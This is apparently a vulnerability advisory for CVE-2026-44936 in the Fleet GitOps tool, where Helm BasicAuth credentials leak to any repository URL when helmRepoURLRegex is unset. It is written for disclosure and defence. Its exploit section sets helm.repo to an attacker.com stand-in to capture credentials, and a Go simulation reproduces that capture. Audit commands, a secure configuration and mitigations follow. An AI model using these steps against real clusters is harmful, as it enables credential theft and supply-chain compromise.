Fleet, Helm Credential Leakage via Unvalidated Repository URL, CVE-2026-44936 (Medium) -DC-Jul2026-815


How CVE-2026-44936 Works

Fleet is a GitOps continuous delivery tool for Kubernetes clusters. It watches Git repositories for changes and deploys Helm charts or Kubernetes manifests to downstream clusters. To fetch private Helm charts, Fleet supports authentication via a `helmSecretName` field in a `GitRepo` resource, which references a Kubernetes Secret containing BasicAuth credentials (username and password) for a private Helm repository.
The vulnerability arises when the `helmRepoURLRegex` field is not set on a `GitRepo` resource. In such a configuration, Fleet’s bundle reader forwards the configured Helm BasicAuth credentials to any URL specified in the `helm.repo` field of a `fleet.yaml` file contained in the monitored Git repository.
An attacker with `git push` access to a Fleet-monitored repository can exploit this by editing `fleet.yaml` so that `helm.repo` points at a URL under their control (e.g., `https://attacker.com/evil`). When Fleet's controller next processes the `GitRepo`, it reads the `fleet.yaml`, extracts the `helm.repo` URL and, because no `helmRepoURLRegex` restricts which origins are allowed, sends the configured BasicAuth credentials to the attacker-specified URL.
The attacker's server receives the credentials (username and password) that the administrator configured to access the private Helm chart repository. This allows the attacker to capture these credentials and potentially use them to authenticate against the legitimate Helm repository or other services if the credentials are reused.
In Fleet v0.13.3 and later, the response body returned by the attacker's server is not included in the error message that Fleet records, so additional internal data (such as cluster metadata or other secrets) cannot be exposed through the `GitRepo` status condition; the exposure is limited to the credentials themselves.
The final severity of this vulnerability is not fixed—it depends entirely on the permissions associated with the leaked credentials. If the credentials grant read‑only access to a single Helm chart repository, the impact is limited. If they grant write access or are reused across multiple systems, the impact can be critical.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: Fleet
Version: <0.12.15, <0.13.11, <0.14.6, <0.15.2
Vulnerability: Helm credential leakage
Severity: Depends on leaked credentials
Date: 2026-05-28
<h2 style="color: blue;">Prediction: Patched versions already released</h2>
<h2 style="color: blue;">What Undercode Say</h2>
<h2 style="color: blue;">Audit Auto‑Migrated GitRepo Resources</h2>
After upgrading to a patched version, review all `GitRepo` resources that were automatically migrated by the Helm pre-upgrade job. The migration job adds the annotation `fleet.cattle.io/helm-regex-auto-migrated: "true"` to resources that had `helmSecretName` or `helmSecretNameForPaths` configured but lacked a `helmRepoURLRegex`.
Run the following command to list all such resources along with their auto‑derived regular expression:

kubectl get gitrepo -A -o json | \
jq -r '.items[] | select(.metadata.annotations["fleet.cattle.io/helm-regex-auto-migrated"] == "true") | "\(.metadata.namespace)/\(.metadata.name): \(.spec.helmRepoURLRegex)"'

<h2 style="color: blue;">Verify the Auto‑Derived Regex</h2>
The migration job extracts the scheme and host from the Helm repository URLs already stored in the resource's Bundles. For example, a `GitRepo` whose Bundles reference `https://charts.example.com/stable` receives `helmRepoURLRegex: "^https://charts\.example\.com/"`.
If the auto-derived regular expression is broader than necessary (e.g., it matches unintended subdomains, or it lacks the trailing `/` and so also matches look-alike hosts such as `charts.example.com.attacker.net`), replace it with a more specific pattern.

Example Secure Configuration

apiVersion: fleet.cattle.io/v1alpha1
kind: GitRepo
metadata:
  name: my-app
  namespace: fleet-local
spec:
  repo: https://git.example.com/org/my-app.git
  helmSecretName: helm-creds
  helmRepoURLRegex: "^https://charts\\.example\\.com/."

This ensures credentials are only forwarded to URLs matching the specified regular expression. Note the doubled backslashes: inside a YAML double-quoted string, `\\.` yields the literal `\.` the regex needs, and the trailing `.` requires at least one character after the host's `/`.

Check Migration Status

The migration job runs only once per installation and records its status in a ConfigMap named `fleet-helm-url-regex-migrated` in the Fleet system namespace. Inspect it with:

kubectl get configmap fleet-helm-url-regex-migrated -n fleet-system -o yaml

Exploit

  1. Gain Git Push Access – The attacker must have write access to a Git repository that Fleet monitors (e.g., through compromised credentials or an insider threat).
  2. Modify `fleet.yaml` – In the repository, edit the `fleet.yaml` file (or create one if it doesn’t exist) and set the `helm.repo` field to a malicious URL under the attacker’s control:
    helm:
      repo: https://attacker.com/evil
      chart: my-chart
      version: 1.0.0
    
  3. Wait for Fleet Sync – Fleet’s controller periodically syncs the `GitRepo` resource. When it processes the updated fleet.yaml, it reads the `helm.repo` URL.
  4. Credential Exfiltration – Because no `helmRepoURLRegex` is set on the GitRepo, Fleet forwards the BasicAuth credentials (from the Secret referenced by helmSecretName) to the attacker’s URL (`https://attacker.com/evil`).
  5. Capture Credentials – The attacker's server receives the HTTP request carrying an `Authorization: Basic <base64(username:password)>` header, decodes it, and obtains the plaintext username and password.
  6. Lateral Movement – The attacker can now use the captured credentials to authenticate against the legitimate Helm repository (or any other service where the credentials are reused), potentially accessing or modifying private Helm charts.
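The exchange in steps 2 to 5, and the credential-forwarding decision described under "How CVE-2026-44936 Works", as one added Go example that is not Fleet's own code: a Fleet-like client takes a `helm.repo` URL and decides from `helmRepoURLRegex` whether to attach the BasicAuth credentials, while an in-process listener plays attacker.com and records what arrives in the `Authorization` header. The credential values, the `index.yaml` request, the `httptest` listener and the behaviour of the patched branch (refusing to forward anything when the regex is unset) are assumptions of this example, not details taken from the advisory.

```go
package main

import (
	"errors"
	"fmt"
	"net/http"
	"net/http/httptest"
	"regexp"
)

// Constructed stand-ins for the username/password in the Secret that
// GitRepo.spec.helmSecretName references (example values, not from the page).
const (
	helmUser = "ci-bot"
	helmPass = "s3cret-token"
)

// allowCredentials decides whether the Helm BasicAuth credentials may be sent to
// repoURL, the helm.repo value read from fleet.yaml. Unpatched model: an empty
// helmRepoURLRegex forwards to any URL. Patched model (an assumption of this
// example): an empty regex is rejected before any request is built.
func allowCredentials(helmRepoURLRegex, repoURL string, patched bool) (bool, error) {
	if helmRepoURLRegex == "" {
		if patched {
			return false, errors.New("helmRepoURLRegex must be set when a Helm secret is configured")
		}
		return true, nil // the vulnerable default
	}
	re, err := regexp.Compile(helmRepoURLRegex)
	if err != nil {
		return false, fmt.Errorf("invalid helmRepoURLRegex: %w", err)
	}
	return re.MatchString(repoURL), nil
}

// fetchIndex mimics the bundle reader fetching <repo>/index.yaml, attaching
// BasicAuth only when allowCredentials permits it.
func fetchIndex(repoURL, helmRepoURLRegex string, patched bool) error {
	ok, err := allowCredentials(helmRepoURLRegex, repoURL, patched)
	if err != nil {
		return err
	}
	req, err := http.NewRequest(http.MethodGet, repoURL+"/index.yaml", nil)
	if err != nil {
		return err
	}
	if ok {
		req.SetBasicAuth(helmUser, helmPass) // Authorization: Basic base64(user:pass)
	}
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return err
	}
	return resp.Body.Close()
}

// captured is what the attacker's listener saw on one request.
type captured struct {
	HasAuth    bool
	User, Pass string
}

// Simulate stands up an in-process listener playing attacker.com, points a
// fleet.yaml-style helm.repo at it, and returns what the listener captured.
func Simulate(helmRepoURLRegex string, patched bool) (captured, error) {
	seen := make(chan captured, 1)
	attacker := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		var c captured
		c.User, c.Pass, c.HasAuth = r.BasicAuth() // decodes the Basic header
		seen <- c
		w.WriteHeader(http.StatusNotFound)
	}))
	defer attacker.Close()

	err := fetchIndex(attacker.URL+"/evil", helmRepoURLRegex, patched)
	var got captured
	select {
	case got = <-seen:
	default: // nothing reached the listener (the patched branch refused early)
	}
	return got, err
}

func main() {
	cases := []struct {
		label, regex string
		patched      bool
	}{
		{"unpatched, regex unset", "", false},
		{"patched, regex unset", "", true},
		{"regex scoped to charts.example.com", `^https://charts\.example\.com/`, false},
	}
	for _, tc := range cases {
		got, err := Simulate(tc.regex, tc.patched)
		fmt.Printf("%-36s captured=%+v err=%v\n", tc.label, got, err)
	}
}
```

Run it with `go run`: the unpatched case prints the captured username and password, the patched case errors before any request is built, and a correctly scoped regex sends the request without an `Authorization` header because the attacker's URL does not match it.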

Protection

– Upgrade to a Patched Version – The most effective mitigation is to upgrade Fleet to one of the patched releases: v0.15.2, v0.14.6, v0.13.11, or v0.12.15. These versions require `helmRepoURLRegex` to be explicitly set before any credentials are forwarded.
– Set `helmRepoURLRegex` Manually – If you cannot upgrade immediately, manually add the `helmRepoURLRegex` field to all `GitRepo` resources that use `helmSecretName` or helmSecretNameForPaths. Ensure the regular expression matches only your legitimate Helm repository origin(s).
– Audit Existing Resources – After upgrading, run the `kubectl` command provided in the “What Undercode Say” section to identify all auto‑migrated resources. Verify that each auto‑derived regex is sufficiently restrictive.
– Rotate Compromised Credentials – If you suspect that credentials may have been leaked (e.g., you cannot rule out prior exploitation), immediately rotate the affected Helm repository credentials and any other credentials that may have been reused.
– Monitor Fleet Logs and Git History – Check Fleet controller logs for unexpected outbound requests to unknown URLs, and review the Git history of monitored repositories for commits that change `helm.repo` in a `fleet.yaml`; either can indicate attempted exploitation.
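The regex derivation described under "Verify the Auto-Derived Regex" and the manual mitigation in the second Protection item, as one added Go example (not Fleet's migration job or its own code): it builds a scheme-plus-host pattern from the Helm repo URLs a GitRepo's bundles reference, probes a candidate pattern against a legitimate URL and some look-alike hosts, and lists the GitRepos that carry a Helm secret but no `helmRepoURLRegex`. The inventory, the look-alike URLs and the alternation form used when a GitRepo spans several origins are assumptions of this example; the single-origin output matches the page's `^https://charts\.example\.com/`.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// gitRepo is a constructed, cut-down view of a Fleet GitRepo plus the helm.repo
// URLs its Bundles reference; field names mirror the spec fields the advisory names.
type gitRepo struct {
	Namespace, Name        string
	HelmSecretName         string
	HelmSecretNameForPaths string
	HelmRepoURLRegex       string
	BundleHelmRepos        []string
}

// deriveRegex anchors on scheme and host of each bundle URL, so
// https://charts.example.com/stable gives ^https://charts\.example\.com/ ;
// several distinct origins become an alternation (an assumption of this example).
func deriveRegex(repoURLs []string) (string, error) {
	seen := map[string]bool{}
	var parts []string
	for _, raw := range repoURLs {
		u, err := url.Parse(raw)
		if err != nil || u.Scheme == "" || u.Host == "" {
			return "", fmt.Errorf("cannot derive an origin from %q", raw)
		}
		if o := regexp.QuoteMeta(u.Scheme + "://" + u.Host + "/"); !seen[o] {
			seen[o] = true
			parts = append(parts, o)
		}
	}
	if len(parts) == 0 {
		return "", fmt.Errorf("no bundle Helm repo URLs to derive from")
	}
	if len(parts) > 1 {
		return "^(" + strings.Join(parts, "|") + ")", nil
	}
	return "^" + parts[0], nil
}

// probeRegex returns what a candidate helmRepoURLRegex gets wrong: legitimate
// URLs it rejects and look-alike URLs it accepts; an empty result means it is tight.
func probeRegex(pattern string, mustMatch, mustNotMatch []string) ([]string, error) {
	re, err := regexp.Compile(pattern)
	if err != nil {
		return nil, err
	}
	var bad []string
	for _, u := range mustMatch {
		if !re.MatchString(u) {
			bad = append(bad, "rejects legitimate "+u)
		}
	}
	for _, u := range mustNotMatch {
		if re.MatchString(u) {
			bad = append(bad, "accepts look-alike "+u)
		}
	}
	return bad, nil
}

// audit maps each GitRepo that carries a Helm secret but no helmRepoURLRegex
// (namespace/name) to the regex proposed from its bundles.
func audit(repos []gitRepo) map[string]string {
	out := map[string]string{}
	for _, r := range repos {
		if (r.HelmSecretName == "" && r.HelmSecretNameForPaths == "") || r.HelmRepoURLRegex != "" {
			continue
		}
		proposed, err := deriveRegex(r.BundleHelmRepos)
		if err != nil {
			proposed = "(set manually: " + err.Error() + ")"
		}
		out[r.Namespace+"/"+r.Name] = proposed
	}
	return out
}

func main() {
	// Constructed inventory standing in for `kubectl get gitrepo -A -o json`.
	repos := []gitRepo{
		{Namespace: "fleet-local", Name: "my-app", HelmSecretName: "helm-creds", BundleHelmRepos: []string{"https://charts.example.com/stable"}},
		{Namespace: "fleet-default", Name: "paid-app", HelmSecretNameForPaths: "helm-paths", BundleHelmRepos: []string{"https://charts.example.com/stable", "https://charts.vendor.example/"}},
	}
	for ref, proposed := range audit(repos) {
		fmt.Printf("%s has a Helm secret but no helmRepoURLRegex; proposed: %s\n", ref, proposed)
	}
	legit := []string{"https://charts.example.com/stable"}
	lookalike := []string{
		"https://charts.example.com.attacker.net/evil", // registered-domain suffix trick
		"http://charts.example.com/stable",             // scheme downgrade
	}
	for _, p := range []string{`^https://charts\.example\.com/`, `^https://charts\.example\.com`} {
		bad, _ := probeRegex(p, legit, lookalike)
		fmt.Printf("%-32s problems=%d %v\n", p, len(bad), bad)
	}
}
```

The probe shows why the trailing `/` in the derived pattern matters: without it the pattern is only a prefix match, so `charts.example.com.attacker.net` slips through, while the anchored form with the slash rejects both look-alikes and still accepts the real repository.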

Impact

  • Credential Theft – An attacker with `git push` access can capture the BasicAuth credentials (username and password) configured for accessing private Helm chart repositories.
  • Scope Depends on Permissions – The actual impact is not fixed; it scales with the permissions of the leaked credentials. If the credentials grant read‑only access to a single repository, the damage is limited. If they grant write access or are reused across multiple systems (e.g., for container registries, CI/CD pipelines, or cloud APIs), the attacker can escalate privileges, modify charts, inject malicious code, or pivot to other environments.
  • Data Exfiltration – While the response body from the attacker's server is no longer reflected in error messages (fixed in v0.13.3 and later), the credentials themselves still reach the attacker's endpoint: HTTPS only protects them in transit, and the attacker's server simply decodes the Base64 `Authorization: Basic` header to recover the plaintext username and password.
  • Supply Chain Risk – Compromised Helm chart credentials can lead to the injection of malicious charts into private repositories, affecting all downstream clusters that consume those charts.
  • Compliance and Audit – Organizations subject to regulations (e.g., GDPR, HIPAA) may face compliance violations if credentials are leaked, especially if they grant access to sensitive data or production environments.

Sources:

Reported By: github.com